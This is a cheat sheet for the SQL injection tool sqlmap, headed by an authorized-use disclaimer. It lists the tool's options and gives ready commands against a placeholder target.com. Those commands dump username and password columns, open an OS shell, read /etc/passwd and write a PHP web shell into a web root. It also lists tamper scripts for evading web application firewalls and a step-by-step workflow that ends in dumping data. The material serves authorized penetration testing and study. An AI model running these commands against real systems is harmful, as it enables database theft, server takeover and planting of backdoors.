SQLMAP
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
BASIC USAGE#
sqlmap -u "http://target.com/page?id=1" sqlmap -u "http://target.com/page?id=1" --dbs sqlmap -u "http://target.com/page?id=1" -D database --tables sqlmap -u "http://target.com/page?id=1" -D database -T table --dump
TARGET OPTIONS#
-u URL Target URL with parameter -d CONN Direct database connection string -l LOGFILE Parse targets from Burp/WebScarab log -m BULKFILE Parse targets from file (one per line) -r REQUESTFILE Load HTTP request from file -g GOOGLEDORK Process Google dork results --data=DATA POST data string --cookie=COOKIE HTTP Cookie header --host=HOST HTTP Host header --referer=REFERER HTTP Referer header -H HEADER Extra HTTP header --headers=HEADERS Extra HTTP headers (file) --auth-type=AUTH HTTP auth type (Basic, Digest, NTLM) --auth-cred=CRED HTTP auth credentials (user:pass) --proxy=PROXY Use proxy (http://host:port) --tor Use Tor network
REQUEST OPTIONS#
--method=METHOD HTTP method (GET, POST, PUT) --param-del=CHAR Parameter delimiter character --chunked Use HTTP chunked encoding --random-agent Use random User-Agent --user-agent=UA Set User-Agent header --delay=DELAY Delay between requests (seconds) --timeout=TIMEOUT Connection timeout (default 30) --retries=RETRIES Retries on timeout (default 3) --safe-url=URL URL to visit between requests --safe-freq=FREQ Requests between safe URL visits
INJECTION OPTIONS#
-p PARAM Testable parameter(s) --skip=SKIP Skip testing for parameters --dbms=DBMS Force DBMS (MySQL, PostgreSQL, MSSQL, Oracle) --prefix=PREFIX Injection payload prefix --suffix=SUFFIX Injection payload suffix --tamper=TAMPER Use tamper scripts
DETECTION OPTIONS#
--level=LEVEL Level of tests (1-5, default 1) --risk=RISK Risk of tests (1-3, default 1) --string=STRING String to match for True --not-string=STRING String to match for False --regexp=REGEXP Regex to match for True --code=CODE HTTP code to match for True --text-only Compare pages based on text only --titles Compare pages based on titles
TECHNIQUES#
--technique=TECH SQL injection techniques to use # B: Boolean-based blind # E: Error-based # U: Union query-based # S: Stacked queries # T: Time-based blind # Q: Inline queries # Examples --technique=BEU Boolean, Error, Union --technique=T Time-based only
ENUMERATION#
--all Retrieve everything -b, --banner DBMS banner --current-user Current DBMS user --current-db Current database --hostname Server hostname --is-dba Is current user DBA? --users DBMS users --passwords DBMS users password hashes --privileges DBMS users privileges --roles DBMS users roles --dbs Available databases --tables Tables in database --columns Columns in table --schema Database schema --count Number of entries --dump Dump table entries --dump-all Dump all tables -D DB Database to enumerate -T TBL Table to enumerate -C COL Column to enumerate --start=FIRST First entry to retrieve --stop=LAST Last entry to retrieve --where=CONDITION WHERE condition
FILE SYSTEM#
--file-read=FILE Read file from server --file-write=LOCAL Local file to write to server --file-dest=DEST Server path to write to
OS ACCESS#
--os-cmd=CMD Execute OS command --os-shell Interactive OS shell --os-pwn OOB shell, Meterpreter, VNC
DATABASE COMMANDS#
--sql-query=QUERY Execute SQL statement --sql-shell Interactive SQL shell --sql-file=FILE Execute SQL from file
FINGERPRINTING#
-f, --fingerprint Extensive DBMS fingerprint
OUTPUT#
-v LEVEL Verbosity level (0-6) -o Turn on all optimization switches --batch Non-interactive mode --output-dir=DIR Output directory --forms Parse and test forms --crawl=DEPTH Crawl starting from target URL
PRACTICAL EXAMPLES#
# Basic GET parameter test sqlmap -u "http://target.com/page.php?id=1" # POST request sqlmap -u "http://target.com/login.php" --data="user=admin&pass=test" # From Burp request file sqlmap -r request.txt # With authentication sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123" # Enumerate databases sqlmap -u "http://target.com/page?id=1" --dbs # Enumerate tables sqlmap -u "http://target.com/page?id=1" -D database_name --tables # Enumerate columns sqlmap -u "http://target.com/page?id=1" -D database_name -T users --columns # Dump table sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump # Dump specific columns sqlmap -u "http://target.com/page?id=1" -D db -T users -C username,password --dump # Get OS shell sqlmap -u "http://target.com/page?id=1" --os-shell # Read file sqlmap -u "http://target.com/page?id=1" --file-read="/etc/passwd" # Write file sqlmap -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php" # SQL shell sqlmap -u "http://target.com/page?id=1" --sql-shell
WAF BYPASS (TAMPER SCRIPTS)#
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment sqlmap -u "http://target.com/page?id=1" --tamper=between,randomcase sqlmap -u "http://target.com/page?id=1" --tamper=charencode # Common tamper scripts: apostrophemask Replace apostrophe with UTF-8 apostrophenullencode Replace apostrophe with illegal unicode appendnullbyte Append null byte base64encode Base64 encode between Replace > with NOT BETWEEN charencode URL-encode all characters charunicodeencode Unicode-URL-encode commalessmid Use MID() without comma equaltolike Replace = with LIKE greatest Replace > with GREATEST modsecurityversioned Version comment for ModSecurity multiplespaces Add multiple spaces nonrecursivereplacement Bypass non-recursive str_replace percentage Add % to each character randomcase Random case securesphere Imperva SecureSphere bypass space2comment Replace space with /**/ space2plus Replace space with + space2randomblank Replace space with random blank unionalltounion Replace UNION ALL with UNION unmagicquotes Replace quotes with multi-byte
OPTIMIZATION#
-o Enable all optimizations --threads=THREADS Max concurrent requests (default 1) --predict-output Predict query output --keep-alive Use persistent HTTP(s) connections --null-connection Get page length without body --eta Display ETA for each output
MISC OPTIONS#
--batch Never ask for user input --wizard Simple wizard interface --update Update sqlmap --purge Remove all sqlmap data --dependencies Check for missing dependencies --identify-waf Identify WAF/IPS --skip-waf Skip WAF/IPS heuristic detection --mobile Use mobile User-Agent --check-internet Check internet connection
DBMS-SPECIFIC#
# MySQL --dbms=mysql # PostgreSQL --dbms=postgresql # Microsoft SQL Server --dbms=mssql # Oracle --dbms=oracle # SQLite --dbms=sqlite
TYPICAL WORKFLOW#
1. Test for vulnerability sqlmap -u "URL" --batch 2. Enumerate databases sqlmap -u "URL" --dbs 3. Enumerate tables sqlmap -u "URL" -D dbname --tables 4. Enumerate columns sqlmap -u "URL" -D dbname -T tablename --columns 5. Dump data sqlmap -u "URL" -D dbname -T tablename --dump